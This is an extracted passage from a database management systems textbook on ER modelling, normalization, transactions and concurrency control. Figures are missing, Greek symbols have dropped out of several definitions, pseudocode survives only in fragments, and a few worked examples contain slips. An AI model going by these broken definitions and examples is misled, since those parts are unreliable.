ENTITY RELATIONSHIP MODEL
The data model describes the structure of a database. It is a collection of conceptual tools
for describing data, data relationships and consistency constraints and various types of data
models such as
3. Physical model
The ER MODEL is a Classical, popular conceptual data model, which is first introduced
(mid 70’s) as a (relatively minor) improvement to the relational model: pictorial diagrams are
easier to read than relational database schemas evolved as a popular model for the first
conceptual representation of data structures in the process of database design.
4.2 Entity Relationship Model
The entity-relationship data model perceives the real world as consisting of basic objects,
called entities and relationships among these objects. It was developed to facilitate database
design by allowing specification of an enterprise schema which represents the overall logical
structure of a database.
• It allows us to describe the data involved in a real world enterprise in terms of objects
and their relationships.
• It provides a set of useful concepts that make it convenient for a developer to move
from a basic set of information to a detailed and description of information that can be
easily implemented in a database system
1. Entity sets
2. Relationship sets
3. Attributes.
An entity is a “thing” or “object” in the real world that is distinguishable from all other
objects. For example, each person in an enterprise is an entity. An entity has a set of properties
and the values for some set of properties may uniquely identify an entity. BOOK is entity and
its properties (called as attributes) bookcode, booktitle, price etc.
An entity set is a set of entities of the same type that share the same properties, or
attributes. Example: The set of all persons who are customers at a given bank.
4.2.3. Attributes
Customer is an entity and its attributes are customerid, custmername, custaddress etc. An
attribute as used in the E-R model, can be characterized by the following attribute types.
Simple attributes are the attributes which can’t be divided into sub parts, e.g. customerid,
empno Composite attributes are the attributes which can be divided into subparts, e.g.
name consisting of first name, middle name, last name and address consisting of city,
pincode, state.
The attribute having unique value is single –valued attribute, e.g. empno, customerid,
regdno etc. The attribute having more than one value is multi-valued attribute, eg:
phone-no, dependent name, vehicle.
c) Derived Attribute
The values for this type of attribute can be derived from the values of existing attributes,
e.g. age which can be derived from currentdate – birthdate and experience_in_year can
be calculated as currentdate - joindate.
The attribute value which is not known to user is called NULL valued attribute.
Consider the two entity sets customer and loan. We define the relationship set borrow
to denote the association between customers and the bank loans that the customers have.
4.4 Entity Relationship Model
1. One to One
1 1
College Principal
has
2. One to Many
1 M
Department Faculty
has
3. Many to One
M 1
4. Many to Many
Entities in A and B are associated with any number of entities from each other.
M M
Customer Deposits Account
Recursive Relationships
When the same entity type participates more than once in a relationship type in different
roles, the relationship types are called recursive relationships.
Participation Constraints
The participation constraints specify whether the existence of any entity depends on its
being related to another entity via the relationship. There are two types of participation
constraints.
a) Total: When all the entities from an entity set participate in a relationship type, is called
total participation. For example, the participation of the entity set student on the
relationship set must ‘opts’ is said to be total because every student enrolled must opt
for a course.
b) Partial: When it is not necessary for all the entities from an entity set to participate in a
relationship type, it is called partial participation. For example, the participation of the
entity set student in ‘represents’ is partial, since not every student in a class is a class
representative.
Weak Entity
Entity types that do not contain any key attribute, and hence cannot be identified
independently are called weak entity types. A weak entity can be identified by uniquely only
by considering some of its attributes in conjunction with the primary key attribute of another
entity, which is called the identifying owner entity.
Generally a partial key is attached to a weak entity type that is used for unique
identification of weak entities related to a particular owner type. The following restrictions must
hold:
4.6 Entity Relationship Model
• The owner entity set and the weak entity set must participate in one to many relationship
set. This relationship set is called the identifying relationship set of the weak entity set.
• The weak entity set must have total participation in the identifying relationship.
Example
Consider the entity type Dependent related to Employee entity, which is used to keep
track of the dependents of each employee. The attributes of Dependents are: name, birthdate,
sex and relationship. Each employee entity set is said to its own the dependent entities that are
related to it. However, not that the ‘Dependent’ entity does not exist of its own, it is dependent
on the Employee entity.
4.3. ER-DIAGRAM
The overall logical structure of a database is represented graphically with the help of an
ER- diagram.
composite
entity
attribute
Identifying
attribute
Relationship
Derived
attribute
Total Partial
participation participation
4.3.2. Examples
Example 1:
Example 2:
Example 3:
Example 4:
(b) Course offering, including course number, year, semester, section number, instructor
timings, and class room
Further, the enrollment of students in courses and grades awarded to students in each
course they are enrolled for must be appropriate modeled. E-R diagram for this registrar's office
is given below:
Example 5:
As the complexity of data increased in the late 1980s, it became more and more difficult
to use the traditional ER Model for database modelling. Hence some improvements or
enhancements were made to the existing ER Model to make it able to handle the complex
applications better.
Hence, as part of the Enhanced ER Model, along with other improvements, three new
concepts were added to the existing ER Model, they were:
1. Generalization
2. Specialization
3. Aggregation
Database Management Systems 4.11
4.4.1. Generalization
Generalization is a bottom-up approach in which two lower level entities combine to
form a higher level entity. In generalization, the higher level entity can also combine with other
lower level entities to make further higher level entity.
It's more like Superclass and Subclass system, but the only difference is the approach,
which is bottom-up. Hence, entities are combined to form a more generalized entity, in other
words, sub-classes are combined to form a super- class.
For example, Saving and Current account types entities can be generalized and an entity
with name Account can be created, which covers both.
4.4.2. Specialization
Specialization is opposite to Generalization. It is a top-down approach in which one
higher level entity can be broken down into two lower level entities. In specialization, a higher
level entity may not have any lower-level entity sets, it's possible.
4.4.3. Aggregation
Aggregation is a process when relation between two entities is treated as a single entity.
4.12 Entity Relationship Model
In the diagram above, the relationship between Center and Course together, is acting as
an Entity, which is in relationship with another entity Visitor. Now in real world, if a Visitor or
a Student visits a Coaching Center, he/she will never enquire about the center only or just about
the course, rather he/she will ask enquire about both.
ER Model can be represented using ER Diagrams which is a great way of designing and
representing the database design in more of a flow chart form. It is very convenient to design
the database using the ER Model by creating an ER diagram and later on converting it into
relational model to design your tables. Not all the ER Model constraints and components can
be directly transformed into relational model, but an approximate schema can be derived. ER
diagrams are converted into relational model schema, hence creating tables in RDBMS.
Entity in ER Model is changed into tables, or we can say for every Entity in ER model,
a table is created in Relational Model, the attributes of the Entity gets converted to columns of
the table, the primary key specified for the entity in the ER model, will become the primary key
for the table in relational model.
A table with name Student will be created in relational model, which will have 4
columns, id, name, age, address and id will be the primary key for this table.
Table: Student
In the ER diagram below, we have two entities Teacher and Student with a relationship
between them.
As discussed above, entity gets mapped to table, hence we will create table for Teacher
and a table for Student with all the attributes converted into columns.
Now, an additional table will be created for the relationship, for example Student
Teacher or give it any name you like. This table will hold the primary key for both Student and
Teacher, in a tuple to describe the relationship, which teacher teaches which student.
If there are additional attributes related to this relationship, then they become the
columns for this table, like subject name. Also proper foreign key constraints must be set for all
the tables.
CHAPTER – V
NORMALIZATION
A functional dependency → holds on R if and only if for any legal relations r(R),
whenever any two tuples t1 and t2 of r agree on the attributes , they also agree on the attributes
. That is,
A B C
1 4 2
1 5 1
3 7 2
1 5 5
On this instance, B → A holds. The reason is that B’s value 5 occurs in row 2 and row
4 and the corresponding A Value is 1 in both rows. But it is not the case in A → B, since A has
1 in three rows but the corresponding B value is not same (1 for row 1 and 5 for rows 2 and 5).
5.2 Normalization
The Rollno 12345 is repeated two times (1st row & 3rd row) and the corresponding name
is Raghuveer in both rows. The same is true for Rollno 12346 also, which specifies Name is
functionally dependent on rollno i.e Rollno→Name.
Key:
For any relation R, the key is defined as an attribute or set of attributes that functionally
determines all the attributes of the relation.
Let us recall the types of keys - Super Key, Candidate Key and Primary Key what we
have discussed in Section 2.2.
Database Management Systems 5.3
Super Key: A super key is a set of one or more attributes to uniquely identify rows in a table.
It may have extraneous attributes. Extraneous attributes are additional attributes to a key.
Candidate key: The minimal set of attributes which uniquely identify a tuple is known as
candidate key. i.e without extraneous attributes.
Primary Key: Primary key uniquely identifies a tuple/row. Candidate key also identifies a
record uniquely, but a relation can have many candidate keys. Any one candidate key is chosen
as primary key and a relation can have only one primary key.
Let us see an example for the above keys. The employee details contain the following
information.
The EmpId determines a unique row and the composite attribute (EmpName, Address)
also identifies a unique row. Hence these are the two candidate keys in this relation. The user
can choose any one of the candidate keys as primary key -for example EmpId. The super key is
may have extraneous attributes in addition to candidate key. Some of the super keys are EmpId,
(EmpID, EmpName), (EmpID, EmpDesignation ) (EmpID, EmpName, Address),
Partial dependencies: Consider a relation has more than one field as primary key. A subset of
non-key fields may depend on only one of the key fields and not on the entire primary key.
Such dependencies are called partial dependencies.
5.4 Normalization
1. What is (AB)+?
Iterations:
Example 2:
(CF)+ = {CFB} // CFB is not a key since A,D,E are missing in (CF)+
If ABF is considered to be the key, then (ABF)+ = {ABFCDE} (It includes all the attributes
of the relation.). So, ABF is the key.
Example 3:
FD1 : A→ BC
FD2 : C →B
FD3 : D → E
FD4 : E → D
Solution:
{A}+ = {A, B, C}
{B}+ = {B}
{C}+ = {C, B }
{D}+ = {D, E}
{E}+ = {E,D}
5.6 Normalization
None of the closure set of A,B,C,D.E is a key since all the resultant set does not include all
the attributes. Hence the single attribute A or B or C or D or E is not key. Hence, we need
to combine two or more attributes to determine the candidate keys. Let us check with
(AD) and (AE).
(AD) + and (AE) + includes all the attributes in the relation. Hence AD and AE are
candidate keys of Relation R. (Note: We can choose any one as Primary Key)
• Armstrong’s axioms are sound, because they do not generate any incorrect functional
dependencies.
• They are complete, because, for a given set F of functional dependencies, they allow us
to generate all F+.
Additional Rules:
Example 1:
Let R = (A, B, C, G, H, I)
F={ A→B A→C CG → H CG → I B → H}
Some members of F+
A→H by transitivity from A → B and B → H
AG → I by augmenting A → C with G, to get AG → CG and
then transitivity with CG → I
CG → HI by augmenting CG → I with CG to infer CG → CGI, and augmenting of CG →
H with I to infer CGI → HI, and then transitivity.
Example 2:
Suppose, R is a relation with attributes (A, B, C, D, E, F) and with the identified set F of
functional dependencies as follows;
F = { A → B, A → C, CD → E, B → E, CD → F }
Find the closure of Functional Dependency F+.
The closure of functional dependency (F+) includes F and new functional dependencies inferred
using the algorithm mentioned above.
1. A → E is logically implied. From our F we have two FDs A → B and B → E. By
applying Transitivity rule, we could infer A → E..
2. A → BC is logically implied. It can be inferred from the FDs A → B and A → C
using Union rule.
5.8 Normalization
R1 ∩ R2 → R1
R1 ∩ R2 → R2
Example:
Let us consider the relation inst_dept (ID, name, salary, dept name, building, budget) is
decomposed into instructor (ID, name, dept name, salary) and department (deptname, building,
budget)
The lossless-decomposition rule is satisfied and hence the decomposition is loss less.
5.3. NORMALIZATION
• Repetition of Information.
Example: Consider the following table which contains the exam results of students. Assume
that each student can enrol in many courses. Mathews has enrolled in two courses C1 & C2 and
Kiran has enrolled in only one course.
5.10 Normalization
A relation is said to be in 1 NF, if it has no repeating groups and data must be atomic.
• A set of names is an example of a non-atomic value. For example, if the schema of a
relation employee included attribute children whose domain elements are sets of names,
the schema would not be in first normal form.
• Composite attributes, such as an attribute address with component attributes street, city,
state, and zip also have non atomic domains.
• Let us consider a scenario in which a student can register in more than one course.
Sample data is shown below.
ID Name Courses
-------------------------------------------
1 Banu c1, c2
2 Elamaran c3
3 Meena c2, c3
The above relation is not in 1 NF, since two values (multi-value) cannot be stored for
Course attribute. The tuples have to be stored as follows and now the relation is in 1NF.
ID Name Course
--------------------------
1 Banu c1
1 Banu c2
2 Elamaran c3
3 Meena c2
3 Meena c3
Eg. Let R={A,B,C,D} with candidate key AB. Then the prime attributes are A and B
and nonprime attributes are C and D.
Example:
Given details in the ExamResult table are:
• sid
• sname
• cid
• cname
• mark
The Functional dependencies are
FD1: sid→ sname ---partial dependency
FD2: cid → cname ---partial dependency
FD3: sid cid → mark --- Full dependency
The key for the relation is (sid, cid). The functional dependency FD3 is only full
dependency, since mark depends fully on the key sid,cid.
The functional dependency 1 is partial, since sname depends only on sid and not on cid.
Similarly, the functional dependency 2 is also partial, since cname depends only on cid and not
on cid.
R1(sid, sname)
R2(cid,cname)
Transitive dependency
2. A table is in 3NF if it is in 2NF and for each functional dependency, X→Y at least
one of the following conditions hold.
Example:
INVOICE
Customer no:
Customer name:
Address:
Invoice ( cus_no,name,addr,(isbn,title,author,city,zip,qty,price))
5.14 Normalization
1 NF:
customer (cus_no,name,addr)
2 NF:
Here, the key is (cus_no, isbn). Qty attribute depends both on the key attributes, but the
other attributes such as title,author,city,zip,price depends only on isbn. This indicates
partial dependency. So the table is decomposed as follows:
customer (cus_no,name,addr) - R1
sales (cus_no,isbn,qty) - R2
book (isbn,title,author,city,zip,price) - R3
3 NF:
Now there are 4 relations after decomposition and all the relations satisfy 3NF.
customer (cus_no,name.addr)
sales (cus_no,isbn,qty)
zip (zipcode,city)
book (isbn,title,author,zipcode,price)
Let F be a set of functional dependencies on a schema R, and let R1, R2, ..., Rn be the
decomposition of R. The restriction of F to Ri is the set Fi of all functional dependencies in F+
that include only attributes of Ri .
Database Management Systems 5.15
Since all functional dependencies in a restriction involve attributes of only one relation
schema, it is possible to test such a dependency for satisfaction by checking only one relation.
Compute F+;
Begin
End
F’= {}
Begin
F’=F’UFi
End
Compute F’+;
else return(false);
Example1:
Step 1:
Find F+.
F+ = {A → B, B → C, A → C, A → BC}
5.16 Normalization
Step 2:
Find the restriction of F for the decomposed relations R1 and R2. (Functional
Dependencies applicable to R1 and R2 separately).
Step 3:
F’ = {A → B, B → C}
Step 4:
F’+ = {A → B, B → C, A → C, A → BC}
Step 5;
Check whether F+ and F’+ are same. If both are same, then the decomposition is
dependency preserving.
Let R be a schema that is not in BCNF. Then there is at least one nontrivial functional
dependency α→β such that is not a super key for R.
Database Management Systems 5.17
3. It may preserve all the dependencies It may not preserve the dependencies.
Example:
FD1: A→BCD
FD2: BC→AD
FD3: D→B.
5.18 Normalization
The keys are A and BC since (A)+ = {A,B,C,D} and (BC)+={BCAD}(Includes all the
attributes). The attribute D is not a key since (D)+ ={DB} where A and B are missing. There is
no partial dependency or transitive dependency. Hence the given relation satisfies 1 NF, 2NF
and 3NF.
In FD1 and FD2, A and BC are keys respectively. But in FD3, D is not a key. Hence
the relation R has to be decomposed. The FD3 D→B violates BCNF. Take the leftside attribute
D as α and right side attribute B as β .
R(A,B,C,D)
R1(DB) R2(ADC)
Functional dependencies rule out certain tuples from being in a relation. If A → B, then
we cannot have two tuples with the same A value but different B values. Multivalued
dependencies, on the other hand, do not rule out the existence of certain tuples. Instead, they
require that other tuples of a certain form be present in the relation
→→
holds on R if in any legal relation r(R), for all pairs for tuples t1 and t2 in r such that t1[] = t2
[], there exist tuples t3 and t4 in r such that:
To illustrate the difference between functional and multivalued dependencies, we consider the
schema shown in Figure 5.2.
Department name is repeated for each address of instructor (for example. he has two
addresses) and we must repeat the address of the instructor for each department in which he is
associated (for example. he works for two departments). This repetition is unnecessary, since
the relationship between an instructor and his address is independent of the relationship between
that instructor and a department.
In the above example, the instructor with ID 22222 is associated with the Physics
department and he has two houses. His department is associated with all his addresses.
1. To test relations to determine whether they are legal under a given set of functional and
multivalued dependencies.
• →→ is trivial (i.e., or = R)
Note that the definition of 4NF differs from the definition of BCNF in only the use of
multivalued dependencies. Every 4NF schema is in BCNF.
multivalued dependencies hold on each ri . Recall that, for a set F of functional dependencies,
the restriction Fi of F to Ri is all functional dependencies in F+ that include only attributes of Ri.
result: = {R};
done := false;
compute D+;
Let Di denote the restriction of D+ to Ri
The analogy between 4NF and BCNF applies to the algorithm for decomposing a
schema into 4NF. It is identical to the BCNF decomposition algorithm, except that it uses
multivalued dependencies and uses the restriction of D+ to Ri .
Consider again the BCNF schema: R(ID, dept name, street, city) in which the
multivalued dependency “ID →→ street, city” holds. Even though this schema is in BCNF, the
design is not ideal, since we must repeat an instructor’s address information for each
department. We can use the given multivalued dependency to improve the database design, by
decomposing this schema into a fourth normal form decomposition.
If we apply the algorithm to Relation R(ID, dept name, street, city), then we find that
ID→→ dept name is a nontrivial multivalued dependency, and ID is not a superkey for the
schema. Following the algorithm, we replace it by two schemas: R1(ID,dept name),R2(ID,
street, city). This pair of schemas is now in 4NF, eliminates the redundancy we encountered
earlier.
Database Management Systems 5.21
The notation used for a join dependency on table is *(X, Y, Z) where X, Y … Z are
projections of T. Table T is said to satisfy the above join dependency, if it is equal to the join
of the projections X, Y, Z.
R1 ( E_Name, Company)
E_Name Company
Rohit TVR
Shiva TMT
Anu APT
Rani TVR
E_Name Product
Rohit Computer
Shiva Furniture
Rani Scanner
R3(Company, Product)
Company Product
TVR Computer
TMT Furniture
TVR Scanner
If the natural join of all three tables yields the relation table R, the relation will be said
to have join dependency. Let us check whether R satisfies join dependency or not.
Database Management Systems 5.23
Step 1
Step 2
Perform the natural join of the above resultant table with R3. The common fields are
Company and Product.
In the above example, we get the same table R after performing the natural joins.
Therefore, the decomposition is lossless decomposition and all three decomposed relations R1,
R2 and R3 satisfies fifth normal form.
CHAPTER – VI
TRANSACTIONS
6.1.1 Introduction
Transaction is collection of operations that form a single logical unit of work. For
example, transfer of money from one account to another is a transaction which consists of two
operations - withdrawal from one account and deposit in another account. The transaction
consists of all operations executed between the begin transaction and end transaction.
read(X) - transfers the data item X from the database to a variable, also called X, in a buffer in
main memory belonging to the transaction that executed the read operation.
write(X) - transfers the value in the variable X in the main-memory buffer of the transaction
that executed the write to the data item X in the database.
There are four important properties that a transaction should satisfy – Atomicity,
Consistency, Isolation and Durability.
• Atomicity
▪ If the transaction fails after step 3 and before step 6 due to power failure, then
Account A will have Rs.950, Account B will have Rs.2000 (Since B is not updated
due to failure. Rs.50 will be “lost” which leads to an inconsistent state.) At times,
the failure may be because of software or hardware.
▪ The system should ensure that updates of a partially executed transaction are not
reflected in the database. The updates should be complete- Do everything or Don’t
do anything.
6.2 Transactions
• Consistency
• Isolation
When more than one transaction is executed concurrently, each transaction is unaware
that other transactions are being executed concurrently in the system. For every pair of
transactions Ti and Tj , it appears to Ti that either Tj finished execution before Ti started
or Tj started execution after Ti finished. The transactions must behave as if they are
executed in isolation. It means that the results of concurrent execution of transactions
should be the same as if the transactions are executed serially in some order.
• Durability
After the successful completion of the transaction (i.e., the transfer of the Rs50 from
Account A to Account B), the updates to the database by the transaction must persist
i.e., permanent even if there are software or hardware failures.
Example:
Let us consider the amount in Account A is Rs.1000 and B is Rs.2000. The following
transaction transfers Rs.50 from account A to account B. After successful completion
of the transaction, Account A will have Rs.950 and B will have Rs.2050.
2. A := A – 50 // Subtracts 50 from A
5. B := B + 50 // Adds 50 from A
A transaction may not always complete its execution successfully and it may fail due to
failure in hardware or software. Such a transaction is called as aborted transaction and an
aborted transaction should not have any effect on the state of the database. In order to maintain
atomicity property, any changes made by the aborted transaction must be undone i.e., rolled
back. A transaction that completes its execution successfully is said to be committed.
• Partially committed - after the final statement has been executed but before committed.
• Failed - after the discovery that normal execution can no longer proceed.
• Aborted - after the transaction has been rolled back and the database has been restored
to its state prior to the start of the transaction.
A transaction enters the failed state when the system determines that the transaction
cannot proceed with normal execution because of hardware or logical errors. Such a transaction
must be rolled back and it enters the aborted state.
At this point, the system can restart the transaction [only hardware or software error] or
kill the transaction [only for internal logical error].
6.2. SCHEDULES
Schedule is a sequence of instructions that specify the chronological order in which the
instructions of are executed. Schedules are of two types: Serial Schedule and Concurrent
schedule. In a serial schedule, a transaction will be executed fully and then only the nest
transaction will start its execution. But in a concurrent schedule, there will be interleaving of
instructions i.e., a part of one transaction is executed, followed by some part of other transaction
and vice versa. The concurrent execution of transactions improves throughput and resource
utilization and reduces waiting time. A schedule for a set of transactions should contain all the
instructions of all those transactions and should preserve the order in which the instructions
appear in each individual transaction. A transaction that successfully completes its execution
will have commit as the last statement whereas a transaction that fails will have an abort
instruction.
Example:
Let T1 and T2 are two transactions in a schedule. Transaction T1 transfers Rs.50 from Account
A to Account B, and T2 transfers 10% of the balance from Account A to Account B.
If the transactions are executed one at a time, T2 followed by T1, then the execution
sequence in the Schedule 2 is as shown below in the Figure 6.3.
The following Schedule 3 is concurrent schedule (Figure 6.4), in which the execution
of statements in T1 and T2 are interleaved. The first 3 statements in T1 are executed first, then
four statements in T2 followed by four statements in T1 and remaining three from T2.
All concurrent Schedules will not be equivalent to serial schedule. For example, the
following concurrent Schedule 4 in Figure 6.5 does not preserve the value of (A + B ). After
the execution of this schedule, the final values of accounts A and B are Rs.950 and Rs.2100
respectively. The sum of A and B is Rs.3050 which is inconsistent. Hence Schedule 4 is not
serialiazable.
6.3. SERIALIZABILITY
1. Conflict serializability
2. View serializability
Let us consider only read and write instructions and ignore other instructions for
explaining the concept of serializability.
Database Management Systems 6.7
Example:
Schedule 3 in Figure 6.6 shows only read and write operations of concurrent schedule
in Figure 6.4. The write(A) instruction of T1 conflicts with the read(A) instruction of T2.
However, the write(A) instruction of T2 does not conflict with the read(B) instruction of T1,
because the two instructions access different data items.
The final result of these swaps, schedule 5 of Figure 6.7, is a serial schedule. Note that
schedule 5 is exactly the same as schedule 1, but it shows only the read and write instructions.
Thus, we have shown that Schedule 3 is equivalent to a serial schedule. If a schedule S can be
transformed into a schedule S’ by a series of swaps of non conflicting instructions, we say that
S and S’ are conflict equivalent.
6.8 Transactions
The below schedule 6 in Figure 6.8 is not conflict serializable, because we cannot swap the
instructions Write(Q) in transaction T3 with Write(Q) in transaction T4 to obtain either the serial
schedule < T3, T4 >, or the serial schedule < T4, T3 >.
Let S and S’ are the two schedules with the same set of transactions and Q be the
common data item present in the transactions. The Schedules S and S’ are said to be view
equivalent if the following three conditions are met, for each data item Q,
The Schedule 8 shown in Figure 6.10 produces the same result as that of the serial
schedule < T1, T5 >, even though it is not conflict equivalent or view equivalent. Determining
such type of equivalence requires analysis of all other operations in addition to read and write.
If a precedence graph is acyclic, then the serializability order can be obtained using
topological sorting of the graph. This is a linear order consistent with the partial order of the
graph. In the below Figure 6.12, b and c are the two ways of topological ordering of figure a.
The precedence graph used to determine conflict serializability cannot be used directly
to test for view serializability because extension to test for view serializability has cost
exponential in the size of the precedence graph. The problem of determining whether a schedule
is view serializable or not falls in the class of NP-complete problems. However there exist some
algorithms that just check some sufficient conditions for view serializability.
• If any transaction executes successfully, then in almost all database systems, by default
every SQL statement commits implicitly. Implicit commit can be turned off by a
database directive
• Isolation level can be set at database level and it can be set at start of transaction
• But if any transaction holds an exclusive lock on an item, no other transactions are
permitted to hold any lock (Both shared and Exclusive) on the item.
Example:
The Transaction T1 transfers Rs.50 from Account B to Account A and the Transaction T2
displays the sum of Account A and Account B.
T1:lock-X(B);
read(B);
B := B − 50;
write(B);
unlock(B);
lock-X(A);
read(A);
A := A + 50;
write(A);
unlock(A)
T2:lock-S(A);
read (A);
unlock(A);
lock-S(B);
read (B);
unlock(B);
display(A+B)
A locking protocol is a set of rules followed by all transactions while requesting and
releasing locks. The Locking protocols enforce serializability. The following schedule shows
Database Management Systems 7.3
the requests made by the Transactions T1 and T2 to lock/unlock the data items A and B and the
permission granted by the concurrency-control manager.
Suppose that the amount in Accounts A and B are Rs.100 and Rs.200, respectively. If
these two transactions are executed serially, either in the order T1, T2 or the order T2, T1, then
transaction T2 will display the value $300. However, if these transactions are executed
concurrently, then schedule 1 in Figure 7.2 is possible. In this case, transaction T2 displays
Rs.250, which is incorrect. The reason for this mistake is that the transaction T1 unlocked data
item B too early, as a result of which T2 saw an inconsistent state.
The schedule shows the actions executed by the transactions, as well as the points at
which the concurrency-control manager grants the locks. The transaction making a lock request
cannot execute its next action until the concurrency control manager grants the lock.
Suppose now that unlocking is delayed to the end of the transaction. Transaction T3
corresponds to T1 with unlocking delayed and Transaction T4 corresponds to T2 with unlocking
delayed. The sequence of reads and writes in schedule 1, which lead to an incorrect total of
Rs.250 is no longer possible with T3.
T3:lock-X(B);
read(B);
B := B − 50;
write(B);
7.4 Concurrency Control
lock-X(A);
read(A);
A := A + 50;
write(A);
unlock(B);
unlock(A).
T4:lock-S(A);
read(A);
lock-S(B);
read(B);
display(A + B);
unlock(A);
unlock(B).
When deadlock occurs, the system must roll back one of the two transactions. Once a
transaction has been rolled back, the data items that were locked by that transaction are
unlocked. These data items are then available to the other transaction, which can continue with
its execution
Database Management Systems 7.5
2. There is no other transaction that is waiting for a lock on Q and that made its lock request
before Ti
Two Phase locking protocol is a protocol which ensures that the schedules are conflict
serializable. There are two phases in two phase locking protocol – Growing Phase and Shrinking
Phase.
Lock point is a point where a transaction has acquired its final lock in the growing phase.
Two-phase locking does not ensure that the schedule is free from deadlock. In order to ensure
recoverability and avoid cascading roll-backs, extension of basic two-phase locking namely
Strict two-phase locking is required.
In a Strict two-phase locking, a transaction must hold all its exclusive locks till it
commits/aborts. There is a variation of Strict two-phase locking, Rigorous two-phase locking
in which a transaction must hold all locks till commit/abort.
The locks can be converted from shared to exclusive and vice versa. In Growing Phase
of a Two-phase locking protocol, a transaction can acquire a lock-S or lock-X. Lock conversion
can also be made to convert a lock-S to a lock-X which is termed as upgrade. Similarly, in a
Shrinking Phase, a transaction can release a lock-S or lock-X or convert a lock-X to a lock-S
which is downgrade.
7.6 Concurrency Control
Consider the following two transactions T8 and T9, for only some of the significant read
and write operations are shown:
T8:
read(a1);
read(a2);
...
read(an);
write(a1).
T9:
read(a1);
read(a2);
display(a1 + a2).
If we employ the two-phase locking protocol, then T8 must lock a1 in exclusive mode.
Therefore, any concurrent execution of both transactions amounts to a serial execution.
However, that T8 needs an exclusive lock on a1 only at the end of its execution, when it writes
a1. Thus, if T8 could initially lock a1 in shared mode, and then could later change the lock to
exclusive mode, we could get more concurrency, since T8 and T9 could access a1 and a2
simultaneously. Figure 7.4 shows the schedule with a lock conversion.
Appropriate lock and unlock instructions will be automatically generated on the basis
of read and write requests from the transaction:
Database Management Systems 7.7
• When Ti issues a write(Q) operation, the system checks to see whether Ti already holds
a shared lock on Q. If it does, then the system issues an upgrade(Q) instruction, followed
by the write(Q) instruction. Otherwise, the system issues a lock-X(Q) instruction,
followed by the write(Q) instruction.
• All locks obtained by a transaction are unlocked after that transaction commits or aborts.
Transactions can send lock or unlock requests as messages to lock manager. The lock
manager decides whether to grant the lock or not based on the lock – compatibility. In case of
a deadlock, the lock manager may ask the transaction to roll back. The requesting transaction
should wait until it gets reply from the lock manager. The lock manager maintains an in-memory
data-structure called a lock table to record the details about the granted locks and pending
requests. A sample lock table is shown in the following Figure 7.5.
Dark blue squares indicate granted locks whereas light blue colored ones indicate
waiting requests. New request is added to the end of the queue of requests for the data item, and
granted only if it is compatible with all earlier granted locks on the data items. When a
transactions sends request to unlock a data item, then the request will be deleted, and later
7.8 Concurrency Control
requests are checked to see if they can now be granted. If a transaction aborts, all waiting or
granted requests of the transaction are deleted. To implement this efficiently, the lock manager
keeps a list of locks held by each transaction.
Each transaction Ti is issued a unique timestamp TS(Ti) when it enters the system.
Newer transactions are assigned with timestamps greater than earlier ones. Timestamp could be
based on a logical counter or wall-clock time. In timestamp-based protocols time-stamp order
is same as that of serializability order.
Timestamp-based protocols imposes set of rules on read and write operations to ensure
that any conflicting operations are executed in timestamp order since out of order operations
cause transaction rollback.
1. If TS(Ti) < W-timestamp(Q), then Ti needs to read a value of Q that was already
overwritten by some other transaction and hence, the read operation is rejected, and Ti
is rolled back.
1. If TS(Ti) < R-timestamp(Q), then the value of Q that Ti is producing was needed
previously and hence, the write operation is rejected, and Ti is rolled back.
Example
In presenting schedules under the timestamp protocol, we shall assume that a transaction is
assigned a timestamp immediately before its first instruction. Thus, in schedule 3 of Figure
15.17, TS(T25) < TS(T26), and the schedule is possible under the timestamp protocol.
1. If TS(Ti) < R-timestamp(Q), then the value of Q that Ti is producing was previously
needed, and it had been assumed that the value would never be produced. Hence, the
system rejects the write operation and rolls Ti back.
7.5 MULTIVERSION
• Multiversion schemes keep old versions of data item to increase concurrency. Several
variants of multiversion schemes are:
o Snapshot isolation
o Each successful write results in the creation of a new version of the data item
written.
Each data item Q has a sequence of versions <Q1, Q2,...., Qm>. Each version Qk contains
three data fields:
Database Management Systems 7.11
Suppose that transaction Ti issues a read(Q) or write(Q) operation. Let Qk denote the
version of Q whose write timestamp is the largest write timestamp <= TS(Ti).
➢ Update transactions:
▪ Perform rigorous two-phase locking - hold all locks up to the end of the transaction.
▪ When an item is to be read, it gets a shared lock on the item, and reads the latest
version of that item.
7.12 Concurrency Control
▪ When an item is to be written, it gets an exclusive lock on the item, and then creates
a new version of the data item.
▪ When the transaction completes its actions, it carries out commit processing
➢ Read-only transactions:
▪ When a transaction Ti issues a read(Q), the value returned is the contents of the
version whose timestamp is the largest timestamp less than or equal to TS(Ti).
▪ The read-only transactions that start after Ti increments ts-counter will see the
values updated by Ti , whereas those that start before Ti increments ts-counter will
see the value before the updates by Ti . In either case, read-only transactions never
need to wait for locks.
Versions are deleted in a manner like that of multiversion timestamp ordering. Suppose
there are two versions, Qk and Qj , of a data item, and that both versions have a
timestamp less than or equal to the timestamp of the oldest read-only transaction in the
system. Then, the older of the two versions Qk and Qj will not be used again and can be
deleted.
In Snapshot isolation, a transaction is given a snapshot of the database at the time when
it begins its execution. It then operates on that snapshot in complete isolation from other
concurrent transactions. The data values in the snapshot consist only of values written by
committed transactions. This isolation is ideal for read-only transactions since they never wait
and are never aborted by the concurrency manager.
Deciding whether or not to allow an update transaction to commit requires some care.
Two transactions running concurrently might both update the same data item. Since these two
transactions operate in isolation using their own private snapshots, neither transaction sees the
update made by the other. If both transactions are allowed to write to the database, the first
update written will be overwritten by the second. The result is a lost update which can be
prevented by two variants of snapshot isolation - first committer wins and first updater wins.
Under first committer wins, when a transaction T enters the partially committed state,
the following actions are taken:
Database Management Systems 7.13
• A test is made to see if any transaction that was concurrent with T has already written
an update to the database for some data item that T intends to write.
• If no such transaction is found, then T commits and its updates are written to the
database.
This approach is called first committer wins because if transactions conflict, the first
one to be tested using the above rule succeeds in writing its updates, while the subsequent ones
are forced to abort.
Under first updater wins the system uses a locking mechanism that applies only to
updates. When a transaction Ti attempts to update a data item, it requests a write lock on that
data item. If the lock is not held by a concurrent transaction, the following steps are taken after
the lock is acquired:
• If the item has been updated by any concurrent transaction, then Ti aborts.
If, however, some other concurrent transaction Tj already holds a write lock on that data
item, then Ti cannot proceed and the following rules are followed:
• If Tj aborts, then the lock is released and Ti can obtain the lock. After the lock is
acquired, the check for an update by a concurrent transaction is performed as described
earlier: Ti aborts if a concurrent transaction had updated the data item, and proceeds
with its execution otherwise.
• If Tj commits, then Ti must abort. Locks are released when the transaction commits or
aborts.
This approach is called first updater wins because if transactions conflict, the first one
to obtain the lock is the one that is permitted to commit and perform its update while the
subsequent ones are to be aborted.
Validation based protocol, also called as optimistic concurrency control commits the
transactions in serialization order, In order to do so, the validation protocol:
1. Read and execution phase: Transaction Ti writes only to temporary local variables and
not to database.
